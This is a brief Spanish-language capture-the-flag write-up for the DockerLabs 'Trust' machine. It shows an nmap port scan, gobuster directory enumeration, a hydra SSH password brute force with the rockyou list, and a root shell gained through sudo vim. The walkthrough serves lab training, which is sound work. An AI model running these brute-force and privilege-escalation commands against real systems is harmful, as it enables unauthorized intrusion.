Skip to main content

Writeup - Trust

144 words
iHarzz
Author
iHarzz
Cybersecurity Enthusiast & Ethical Hacker

WRITEUP TRUST - DOCKERLABS
#

INTRUSIÓN
#

RECONOCIMIENTO
#

❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -Pn -n 172.19.0.2  -oG allPorts

PUERTOS
#

PUERTO SERVICIO
22 SSH
80 HTTP

SERVICIO HTTP
#

Página Apache por defecto, vamos a buscar directorios.

❯ gobuster dir -u http://172.19.0.2/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20 -x html,php,txt,js

Como observamos en pantalla, vemos un usuario llamado “Mario” vamos a ver si con el usuario podemos obtener credenciales para el SSH realizando fuerza bruta al mismo servicio.

❯ hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://172.19.0.2

Una vez obtenidas estas credenciales, vamos a probarlas en el SSH.

ESCALADA DE PRIVILEGIOS
#

Como podemos ver, hemos conseguido acceso al SSH, ahora vamos a probar posibles escaladas de privilegios.

Como vemos, disponemos de “VIM” con permiso SUDO, vamos aver si podemos ejecutar una bash como root abusando de VIM.

❯ sudo /usr/bin/vim -c ':!/bin/bash'